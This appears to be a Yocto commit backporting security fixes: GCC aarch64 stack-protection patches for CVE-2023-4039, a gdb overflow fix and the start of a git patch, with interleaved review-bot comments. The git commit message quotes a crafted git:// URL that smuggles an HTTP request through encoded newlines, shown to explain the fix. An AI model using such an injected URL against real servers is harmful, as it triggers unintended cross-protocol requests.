1032index 00000000000..82447d20fff
1033--- /dev/null
1034+++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1035@@ -0,0 +1,100 @@
1036+/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
1037+/* { dg-final { check-function-bodies "**" "" } } */
1038+
1039+void f(int, ...);
1040+void g();
1041+
1042+/*
1043+** test1:
1044+** ...
1045+** str x30, \[sp\]
1046+** sub sp, sp, #4064
1047+** str xzr, \[sp\]
1048+** cbnz w0, .*
1049+** bl g
1050+** ...
1051+** str x26, \[sp, #?4128\]
1052+** ...
1053+*/
1054+int test1(int z) {
1055+ __uint128_t x = 0;
1056+ int y[0x400];
1057+ if (z)
1058+ {
1059+ asm volatile ("" :::
1060+ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
1061+ f(0, 0, 0, 0, 0, 0, 0, &y,
1062+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1063+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1064+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1065+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1066+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1067+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1068+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1069+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1070+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1071+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1072+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1073+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1074+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1075+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1076+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1077+ x, x, x, x, x, x, x, x, x, x, x, x, x, x);
1078+ }
1079+ g();
1080+ return 1;
1081+}
1082+
1083+/*
1084+** test2:
1085+** ...
1086+** str x30, \[sp\]
1087+** sub sp, sp, #1040
1088+** str xzr, \[sp\]
1089+** cbnz w0, .*
1090+** bl g
1091+** ...
1092+*/
1093+int test2(int z) {
1094+ __uint128_t x = 0;
1095+ int y[0x400];
1096+ if (z)
1097+ {
1098+ asm volatile ("" :::
1099+ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
1100+ f(0, 0, 0, 0, 0, 0, 0, &y,
1101+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1102+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1103+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1104+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1105+ x);
1106+ }
1107+ g();
1108+ return 1;
1109+}
1110+
1111+/*
1112+** test3:
1113+** ...
1114+** str x30, \[sp\]
1115+** sub sp, sp, #1024
1116+** cbnz w0, .*
1117+** bl g
1118+** ...
1119+*/
1120+int test3(int z) {
1121+ __uint128_t x = 0;
1122+ int y[0x400];
1123+ if (z)
1124+ {
1125+ asm volatile ("" :::
1126+ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
1127+ f(0, 0, 0, 0, 0, 0, 0, &y,
1128+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1129+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1130+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1131+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
1132+ }
1133+ g();
1134+ return 1;
1135+}
1136--
11372.34.1
1138
1139
1140From f2684e63652bb251d22c79e40081c646df1f36b6 Mon Sep 17 00:00:00 2001
1141From: Richard Sandiford <richard.sandiford@arm.com>
1142Date: Tue, 8 Aug 2023 01:57:26 +0100
1143Subject: [PATCH 09/10] aarch64: Simplify probe of final frame allocation
1144
1145Previous patches ensured that the final frame allocation only needs
1146a probe when the size is strictly greater than 1KiB. It's therefore
1147safe to use the normal 1024 probe offset in all cases.
1148
1149The main motivation for doing this is to simplify the code and
1150remove the number of special cases.
1151
1152gcc/
1153 * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
1154 Always probe the residual allocation at offset 1024, asserting
1155 that that is in range.
1156
1157gcc/testsuite/
1158 * gcc.target/aarch64/stack-check-prologue-17.c: Expect the probe
1159 to be at offset 1024 rather than offset 0.
1160 * gcc.target/aarch64/stack-check-prologue-18.c: Likewise.
1161---
1162 gcc/config/aarch64/aarch64.c | 12 ++++--------
1163 .../gcc.target/aarch64/stack-check-prologue-17.c | 2 +-
1164 .../gcc.target/aarch64/stack-check-prologue-18.c | 7 +++++--
1165 3 files changed, 10 insertions(+), 11 deletions(-)
1166
1167diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
1168index 1e8467fdd03..705f719a2ea 100644
1169--- a/gcc/config/aarch64/aarch64.c
1170+++ b/gcc/config/aarch64/aarch64.c
1171@@ -5695,16 +5695,12 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
1172 are still safe. */
1173 if (residual)
1174 {
1175- HOST_WIDE_INT residual_probe_offset = guard_used_by_caller;
1176+ gcc_assert (guard_used_by_caller + byte_sp_alignment <= size);
1177+
1178 /* If we're doing final adjustments, and we've done any full page
1179 allocations then any residual needs to be probed. */
1180 if (final_adjustment_p && rounded_size != 0)
1181 min_probe_threshold = 0;
1182- /* If doing a small final adjustment, we always probe at offset 0.
1183- This is done to avoid issues when the final adjustment is smaller
1184- than the probing offset. */
1185- else if (final_adjustment_p && rounded_size == 0)
1186- residual_probe_offset = 0;
1187
1188 aarch64_sub_sp (temp1, temp2, residual, frame_related_p);
1189 if (residual >= min_probe_threshold)
1190@@ -5715,8 +5711,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
1191 HOST_WIDE_INT_PRINT_DEC " bytes, probing will be required."
1192 "\n", residual);
1193
1194- emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
1195- residual_probe_offset));
1196+ emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
1197+ guard_used_by_caller));
1198 emit_insn (gen_blockage ());
1199 }
1200 }
1201diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
1202index 0d8a25d73a2..f0ec1389771 100644
1203--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
1204+++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
1205@@ -33,7 +33,7 @@ int test1(int z) {
1206 ** ...
1207 ** str x30, \[sp\]
1208 ** sub sp, sp, #1040
1209-** str xzr, \[sp\]
1210+** str xzr, \[sp, #?1024\]
1211 ** cbnz w0, .*
1212 ** bl g
1213 ** ...
1214diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1215index 82447d20fff..71d33ba34e9 100644
1216--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1217+++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1218@@ -8,8 +8,9 @@ void g();
1219 ** test1:
1220 ** ...
1221 ** str x30, \[sp\]
1222+** ...
1223 ** sub sp, sp, #4064
1224-** str xzr, \[sp\]
1225+** str xzr, \[sp, #?1024\]
1226 ** cbnz w0, .*
1227 ** bl g
1228 ** ...
1229@@ -49,8 +50,9 @@ int test1(int z) {
1230 ** test2:
1231 ** ...
1232 ** str x30, \[sp\]
1233+** ...
1234 ** sub sp, sp, #1040
1235-** str xzr, \[sp\]
1236+** str xzr, \[sp, #?1024\]
1237 ** cbnz w0, .*
1238 ** bl g
1239 ** ...
1240@@ -77,6 +79,7 @@ int test2(int z) {
1241 ** test3:
1242 ** ...
1243 ** str x30, \[sp\]
1244+** ...
1245 ** sub sp, sp, #1024
1246 ** cbnz w0, .*
1247 ** bl g
1248--
12492.34.1
1250
1251
1252From bf3eeaa0182a92987570d9c787bd45079eebf528 Mon Sep 17 00:00:00 2001
1253From: Richard Sandiford <richard.sandiford@arm.com>
1254Date: Thu, 15 Jun 2023 19:16:52 +0100
1255Subject: [PATCH 10/10] aarch64: Make stack smash canary protect saved
1256 registers
1257
1258AArch64 normally puts the saved registers near the bottom of the frame,
1259immediately above any dynamic allocations. But this means that a
1260stack-smash attack on those dynamic allocations could overwrite the
1261saved registers without needing to reach as far as the stack smash
1262canary.
1263
1264The same thing could also happen for variable-sized arguments that are
1265passed by value, since those are allocated before a call and popped on
1266return.
1267
1268This patch avoids that by putting the locals (and thus the canary) below
1269the saved registers when stack smash protection is active.
1270
1271The patch fixes CVE-2023-4039.
1272
1273gcc/
1274 * config/aarch64/aarch64.c (aarch64_save_regs_above_locals_p):
1275 New function.
1276 (aarch64_layout_frame): Use it to decide whether locals should
1277 go above or below the saved registers.
1278 (aarch64_expand_prologue): Update stack layout comment.
1279 Emit a stack tie after the final adjustment.
1280
1281gcc/testsuite/
1282 * gcc.target/aarch64/stack-protector-8.c: New test.
1283 * gcc.target/aarch64/stack-protector-9.c: Likewise.
1284---
1285 gcc/config/aarch64/aarch64.c | 46 +++++++++++++--
1286 .../gcc.target/aarch64/stack-protector-8.c | 58 +++++++++++++++++++
1287 .../gcc.target/aarch64/stack-protector-9.c | 33 +++++++++++
1288 3 files changed, 133 insertions(+), 4 deletions(-)
1289 create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
1290 create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
1291
1292diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
1293index 705f719a2ea..3d094214fac 100644
1294--- a/gcc/config/aarch64/aarch64.c
1295+++ b/gcc/config/aarch64/aarch64.c
1296@@ -4622,6 +4622,20 @@ aarch64_needs_frame_chain (void)
1297 return aarch64_use_frame_pointer;
1298 }
1299
1300+/* Return true if the current function should save registers above
1301+ the locals area, rather than below it. */
1302+
1303+static bool
1304+aarch64_save_regs_above_locals_p ()
1305+{
1306+ /* When using stack smash protection, make sure that the canary slot
1307+ comes between the locals and the saved registers. Otherwise,
1308+ it would be possible for a carefully sized smash attack to change
1309+ the saved registers (particularly LR and FP) without reaching the
1310+ canary. */
1311+ return crtl->stack_protect_guard;
1312+}
1313+
1314 /* Mark the registers that need to be saved by the callee and calculate
1315 the size of the callee-saved registers area and frame record (both FP
1316 and LR may be omitted). */
1317@@ -4686,6 +4700,16 @@ aarch64_layout_frame (void)
1318
1319 cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
1320
1321+ bool regs_at_top_p = aarch64_save_regs_above_locals_p ();
1322+
1323+ if (regs_at_top_p)
1324+ {
1325+ cfun->machine->frame.bytes_below_hard_fp += get_frame_size ();
1326+ cfun->machine->frame.bytes_below_hard_fp
1327+ = aligned_upper_bound (cfun->machine->frame.bytes_below_hard_fp,
1328+ STACK_BOUNDARY / BITS_PER_UNIT);
1329+ }
1330+
1331 #define ALLOCATE_GPR_SLOT(REGNO) \
1332 do \
1333 { \
1334@@ -4758,9 +4782,11 @@ aarch64_layout_frame (void)
1335 HOST_WIDE_INT varargs_and_saved_regs_size
1336 = offset + cfun->machine->frame.saved_varargs_size;
1337
1338+ cfun->machine->frame.bytes_above_hard_fp = varargs_and_saved_regs_size;
1339+ if (!regs_at_top_p)
1340+ cfun->machine->frame.bytes_above_hard_fp += get_frame_size ();
1341 cfun->machine->frame.bytes_above_hard_fp
1342- = aligned_upper_bound (varargs_and_saved_regs_size
1343- + get_frame_size (),
1344+ = aligned_upper_bound (cfun->machine->frame.bytes_above_hard_fp,
1345 STACK_BOUNDARY / BITS_PER_UNIT);
1346
1347 /* Both these values are already aligned. */
1348@@ -4772,6 +4798,9 @@ aarch64_layout_frame (void)
1349
1350 cfun->machine->frame.bytes_above_locals
1351 = cfun->machine->frame.saved_varargs_size;
1352+ if (regs_at_top_p)
1353+ cfun->machine->frame.bytes_above_locals
1354+ += cfun->machine->frame.saved_regs_size;
1355
1356 cfun->machine->frame.initial_adjust = 0;
1357 cfun->machine->frame.final_adjust = 0;
1358@@ -5764,10 +5793,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
1359 | for register varargs |
1360 | |
1361 +-------------------------------+
1362- | local variables | <-- frame_pointer_rtx
1363+ | local variables (1) | <-- frame_pointer_rtx
1364 | |
1365 +-------------------------------+
1366- | padding | \
1367+ | padding (1) | \
1368 +-------------------------------+ |
1369 | callee-saved registers | | frame.saved_regs_size
1370 +-------------------------------+ |
1371@@ -5775,6 +5804,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
1372 +-------------------------------+ |
1373 | FP' | / <- hard_frame_pointer_rtx (aligned)
1374 +-------------------------------+
1375+ | local variables (2) |
1376+ +-------------------------------+
1377+ | padding (2) |
1378+ +-------------------------------+
1379 | dynamic allocation |
1380 +-------------------------------+
1381 | padding |
1382@@ -5784,6 +5817,9 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
1383 +-------------------------------+
1384 | | <-- stack_pointer_rtx (aligned)
1385
1386+ The regions marked (1) and (2) are mutually exclusive. (2) is used
1387+ when aarch64_save_regs_above_locals_p is true.
1388+
1389 Dynamic stack allocations via alloca() decrease stack_pointer_rtx
1390 but leave frame_pointer_rtx and hard_frame_pointer_rtx
1391 unchanged.
1392@@ -5937,6 +5973,8 @@ aarch64_expand_prologue (void)
1393 that is assumed by the called. */
1394 aarch64_allocate_and_probe_stack_space (tmp1_rtx, tmp0_rtx, final_adjust,
1395 !frame_pointer_needed, true);
1396+ if (emit_frame_chain && maybe_ne (final_adjust, 0))
1397+ emit_insn (gen_stack_tie (stack_pointer_rtx, hard_frame_pointer_rtx));
1398 }
1399
1400 /* Return TRUE if we can use a simple_return insn.
1401diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
1402new file mode 100644
1403index 00000000000..c5e7deef6c1
1404--- /dev/null
1405+++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
1406@@ -0,0 +1,58 @@
1407+/* { dg-options " -O -fstack-protector-strong -mstack-protector-guard=sysreg -mstack-protector-guard-reg=tpidr2_el0 -mstack-protector-guard-offset=16" } */
1408+/* { dg-final { check-function-bodies "**" "" } } */
1409+
1410+void g(void *);
1411+
1412+/*
1413+** test1:
1414+** sub sp, sp, #288
1415+** stp x29, x30, \[sp, #?272\]
1416+** add x29, sp, #?272
1417+** mrs (x[0-9]+), tpidr2_el0
1418+** ldr (x[0-9]+), \[\1, #?16\]
1419+** str \2, \[sp, #?264\]
1420+** mov \2, *0
1421+** add x0, sp, #?8
1422+** bl g
1423+** ...
1424+** mrs .*
1425+** ...
1426+** bne .*
1427+** ...
1428+** ldp x29, x30, \[sp, #?272\]
1429+** add sp, sp, #?288
1430+** ret
1431+** bl __stack_chk_fail
1432+*/
1433+int test1() {
1434+ int y[0x40];
1435+ g(y);
1436+ return 1;
1437+}
1438+
1439+/*
1440+** test2:
1441+** stp x29, x30, \[sp, #?-16\]!
1442+** mov x29, sp
1443+** sub sp, sp, #1040
1444+** mrs (x[0-9]+), tpidr2_el0
1445+** ldr (x[0-9]+), \[\1, #?16\]
1446+** str \2, \[sp, #?1032\]
1447+** mov \2, *0
1448+** add x0, sp, #?8
1449+** bl g
1450+** ...
1451+** mrs .*
1452+** ...
1453+** bne .*
1454+** ...
1455+** add sp, sp, #?1040
1456+** ldp x29, x30, \[sp\], #?16
1457+** ret
1458+** bl __stack_chk_fail
1459+*/
1460+int test2() {
1461+ int y[0x100];
1462+ g(y);
1463+ return 1;
1464+}
1465diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
1466new file mode 100644
1467index 00000000000..58f322aa480
1468--- /dev/null
1469+++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
1470@@ -0,0 +1,33 @@
1471+/* { dg-options "-O2 -mcpu=neoverse-v1 -fstack-protector-all" } */
1472+/* { dg-final { check-function-bodies "**" "" } } */
1473+
1474+/*
1475+** main:
1476+** ...
1477+** stp x29, x30, \[sp, #?-[0-9]+\]!
1478+** ...
1479+** sub sp, sp, #[0-9]+
1480+** ...
1481+** str x[0-9]+, \[x29, #?-8\]
1482+** ...
1483+*/
1484+int f(const char *);
1485+void g(void *);
1486+int main(int argc, char* argv[])
1487+{
1488+ int a;
1489+ int b;
1490+ char c[2+f(argv[1])];
1491+ int d[0x100];
1492+ char y;
1493+
1494+ y=42; a=4; b=10;
1495+ c[0] = 'h'; c[1] = '\0';
1496+
1497+ c[f(argv[2])] = '\0';
1498+
1499+ __builtin_printf("%d %d\n%s\n", a, b, c);
1500+ g(d);
1501+
1502+ return 0;
1503+}
1504--
15052.34.1
1506
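--- a/meta/recipes-devtools/gcc/gcc-common.inc
+++ b/meta/recipes-devtools/gcc/gcc-common.inc
@@ -1,5 +1,6 @@
 SUMMARY = "GNU cc and gcc C compilers"
 HOMEPAGE = "http://www.gnu.org/software/gcc/"
+DESCRIPTION = "The GNU Compiler Collection includes front ends for C, C++, Objective-C, Fortran, Ada, Go, and D, as well as libraries for these languages (libstdc++,...). GCC was originally written as the compiler for the GNU operating system."
 SECTION = "devel"
 LICENSE = "GPL"
 
@@ -99,7 +100,7 @@ BINV = "${PV}"
 #S = "${WORKDIR}/gcc-${PV}"
 S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
 
-B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B ?= "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
 
 target_includedir ?= "${includedir}"
 target_libdir ?= "${libdir}"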
diff --git a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
index bf53c5cd78..bf53c5cd78 100644
--- a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
index b43cca0c52..b43cca0c52 100644
--- a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
index 40a6c4feff..40a6c4feff 100644
--- a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
index dd430b57eb..dd430b57eb 100644
--- a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
index f3c7058114..f3c7058114 100644
--- a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
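--- a/meta/recipes-devtools/gcc/gcc-shared-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-shared-source.inc
@@ -9,3 +9,6 @@ SRC_URI = ""
 
 do_configure[depends] += "gcc-source-${PV}:do_preconfigure"
 do_populate_lic[depends] += "gcc-source-${PV}:do_unpack"
+
+# patch is available via gcc-source recipe
+CVE_CHECK_WHITELIST += "CVE-2023-4039"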
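Review bot: The comment on the new `CVE_CHECK_WHITELIST` entry does not say which patch it relies on, so nothing ties the suppression to the fix. The entry hides CVE-2023-4039 from cve-check for every recipe that includes this file, which is only correct while the gcc-source recipe still applies the backport. If that patch is dropped or stops applying after a later version bump, the report would stay silent. I would name the patch in the comment, e.g. `# CVE-2023-4039 is fixed by <patch file name> in gcc-source; remove this entry if that patch is dropped`.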
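--- a/meta/recipes-devtools/gcc/gcc-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-source.inc
@@ -18,6 +18,7 @@ INHIBIT_DEFAULT_DEPS = "1"
 DEPENDS = ""
 PACKAGES = ""
 
+B = "${WORKDIR}/build"
 
 # This needs to be Python to avoid lots of shell variables becoming dependencies.
 python do_preconfigure () {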
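Review bot: The new `B = "${WORKDIR}/build"` carries no comment, and its purpose is only hinted at by the matching switch from `B =` to `B ?=` in gcc-common.inc in this same commit. A one-line why-comment above the assignment, e.g. `# gcc-source sets its own B; gcc-common.inc only provides a weak default`, would keep a later cleanup from reverting one half without the other. How the two files are included relative to each other is not visible in this hunk, so the wording should be checked against the recipe.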
diff --git a/meta/recipes-devtools/gcc/gcc-source_9.3.bb b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
index b890fa33ea..b890fa33ea 100644
--- a/meta/recipes-devtools/gcc/gcc-source_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc_9.3.bb b/meta/recipes-devtools/gcc/gcc_9.5.bb
index 7d93590588..7d93590588 100644
--- a/meta/recipes-devtools/gcc/gcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
index 0c698c26ec..0c698c26ec 100644
--- a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc_9.3.bb b/meta/recipes-devtools/gcc/libgcc_9.5.bb
index ea210a1130..ea210a1130 100644
--- a/meta/recipes-devtools/gcc/libgcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgfortran_9.3.bb b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
index 71dd8b4bdc..71dd8b4bdc 100644
--- a/meta/recipes-devtools/gcc/libgfortran_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
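--- a/meta/recipes-devtools/gdb/gdb-9.1.inc
+++ b/meta/recipes-devtools/gdb/gdb-9.1.inc
@@ -16,6 +16,7 @@ SRC_URI = "${GNU_MIRROR}/gdb/gdb-${PV}.tar.xz \
  file://0009-resolve-restrict-keyword-conflict.patch \
  file://0010-Fix-invalid-sigprocmask-call.patch \
  file://0011-gdbserver-ctrl-c-handling.patch \
+ file://0012-CVE-2023-39128.patch \
  "
 SRC_URI[md5sum] = "f7e9f6236c425097d9e5f18a6ac40655"
 SRC_URI[sha256sum] = "699e0ec832fdd2f21c8266171ea5bf44024bd05164fdf064e4d10cc4cf0d1737"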
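--- a/meta/recipes-devtools/gdb/gdb-common.inc
+++ b/meta/recipes-devtools/gdb/gdb-common.inc
@@ -1,5 +1,6 @@
 SUMMARY = "GNU debugger"
 HOMEPAGE = "http://www.gnu.org/software/gdb/"
+DESCRIPTION = "GDB, the GNU Project debugger, allows you to see what is going on inside another program while it executes -- or what another program was doing at the moment it crashed."
 SECTION = "devel"
 DEPENDS = "expat zlib ncurses virtual/libiconv ${LTTNGUST} bison-native"
 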
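--- /dev/null
+++ b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
@@ -0,0 +1,75 @@
+From 033bc52bb6190393c8eed80925fa78cc35b40c6d Mon Sep 17 00:00:00 2001
+From: Tom Tromey <tromey@adacore.com>
+Date: Wed, 16 Aug 2023 11:29:19 -0600
+Subject: [PATCH] Avoid buffer overflow in ada_decode
+
+A bug report pointed out a buffer overflow in ada_decode, which Keith
+helpfully analyzed. ada_decode had a logic error when the input was
+all digits. While this isn't valid -- and would probably only appear
+in fuzzer tests -- it still should be handled properly.
+
+This patch adds a missing bounds check. Tested with the self-tests in
+an asan build.
+
+Bug: https://sourceware.org/bugzilla/show_bug.cgi?id=30639
+Reviewed-by: Keith Seitz <keiths@redhat.com>
+
+Upstream-Status: Backport from [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=033bc52bb6190393c8eed80925fa78cc35b40c6d]
+CVE: CVE-2023-39128
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ gdb/ada-lang.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/gdb/ada-lang.c b/gdb/ada-lang.c
+index 0c2d4fc..40852b6 100644
+--- a/gdb/ada-lang.c
++++ b/gdb/ada-lang.c
+@@ -56,6 +56,7 @@
+ #include "cli/cli-utils.h"
+ #include "gdbsupport/function-view.h"
+ #include "gdbsupport/byte-vector.h"
++#include "gdbsupport/selftest.h"
+ #include <algorithm>
+
+ /* Define whether or not the C operator '/' truncates towards zero for
+@@ -1184,7 +1185,7 @@ ada_decode (const char *encoded)
+ i -= 1;
+ if (i > 1 && encoded[i] == '_' && encoded[i - 1] == '_')
+ len0 = i - 1;
+- else if (encoded[i] == '$')
++ else if (i >= 0 && encoded[i] == '$')
+ len0 = i;
+ }
+
+@@ -1350,6 +1351,18 @@ Suppress:
+
+ }
+
++#ifdef GDB_SELF_TEST
++
++static void
++ada_decode_tests ()
++{
++ /* This isn't valid, but used to cause a crash. PR gdb/30639. The
++ result does not really matter very much. */
++ SELF_CHECK (ada_decode ("44") == "44");
++}
++
++#endif
++
+ /* Table for keeping permanent unique copies of decoded names. Once
+ allocated, names in this table are never released. While this is a
+ storage leak, it should not be significant unless there are massive
+@@ -14345,4 +14358,8 @@ DWARF attribute."),
+ gdb::observers::new_objfile.attach (ada_new_objfile_observer);
+ gdb::observers::free_objfile.attach (ada_free_objfile_observer);
+ gdb::observers::inferior_exit.attach (ada_inferior_exit);
++
++#ifdef GDB_SELF_TEST
++ selftests::register_test ("ada-decode", ada_decode_tests);
++#endif
+ }
+--
+2.24.4
+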
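Review bot: The added `i >= 0 &&` guard in ada_decode has no comment saying when `i` can be negative, so the reason for the check lives only in the commit message (an input that is all digits). A short comment above the `else if`, such as `/* i can be negative here when ENCODED consists only of digits.  */`, would keep the guard from being dropped in a later cleanup. That wording is inferred from the message, since the loop that decrements `i` starts outside the hunk. The regression check `ada_decode_tests` is compiled only under `GDB_SELF_TEST`, so whether it ever runs for this recipe depends on the build configuration.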
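--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
@@ -0,0 +1,108 @@
+From e77ca0c7d577408878d2b3e8c7336e6119cb3931 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 25 Nov 2021 06:36:26 +0000
+Subject: [PATCH] git_connect_git(): forbid newlines in host and path
+
+When we connect to a git:// server, we send an initial request that
+looks something like:
+
+ 002dgit-upload-pack repo.git\0host=example.com
+
+If the repo path contains a newline, then it's included literally, and
+we get:
+
+ 002egit-upload-pack repo
+ .git\0host=example.com
+
+This works fine if you really do have a newline in your repository name;
+the server side uses the pktline framing to parse the string, not
+newlines. However, there are many _other_ protocols in the wild that do
+parse on newlines, such as HTTP. So a carefully constructed git:// URL
+can actually turn into a valid HTTP request. For example:
+
+ git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a
+
+becomes:
+
+ 0050git-upload-pack /
+ GET / HTTP/1.1
+ Host:localhost
+
+ host=localhost:1234
+
+on the wire. Again, this isn't a problem for a real Git server, but it
+does mean that feeding a malicious URL to Git (e.g., through a
+submodule) can cause it to make unexpected cross-protocol requests.
+Since repository names with newlines are presumably quite rare (and
+indeed, we already disallow them in git-over-http), let's just disallow
+them over this protocol.
+
+Hostnames could likewise inject a newline, but this is unlikely a
+problem in practice; we'd try resolving the hostname with a newline in
+it, which wouldn't work. Still, it doesn't hurt to err on the side of
+caution there, since we would not expect them to work in the first
+place.
+
+The ssh and local code paths are unaffected by this patch. In both cases
+we're trying to run upload-pack via a shell, and will quote the newline
+so that it makes it intact. An attacker can point an ssh url at an
+arbitrary port, of course, but unless there's an actual ssh server
+there, we'd never get as far as sending our shell command anyway. We
+_could_ similarly restrict newlines in those protocols out of caution,
+but there seems little benefit to doing so.
+
+The new test here is run alongside the git-daemon tests, which cover the
+same protocol, but it shouldn't actually contact the daemon at all. In
+theory we could make the test more robust by setting up an actual
+repository with a newline in it (so that our clone would succeed if our
+new check didn't kick in). But a repo directory with newline in it is
+likely not portable across all filesystems. Likewise, we could check
+git-daemon's log that it was not contacted at all, but we do not
+currently record the log (and anyway, it would make the test racy with
+the daemon's log write). We'll just check the client-side stderr to make
+sure we hit the expected code path.
+
+Reported-by: Harold Kim <h.kim@flatt.tech>
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backported [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473]
+CVE: CVE-2021-40330
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ connect.c | 2 ++
+ t/t5570-git-daemon.sh | 5 +++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/connect.c b/connect.c
+index b6451ab..929de9a 100644
+--- a/connect.c
++++ b/connect.c
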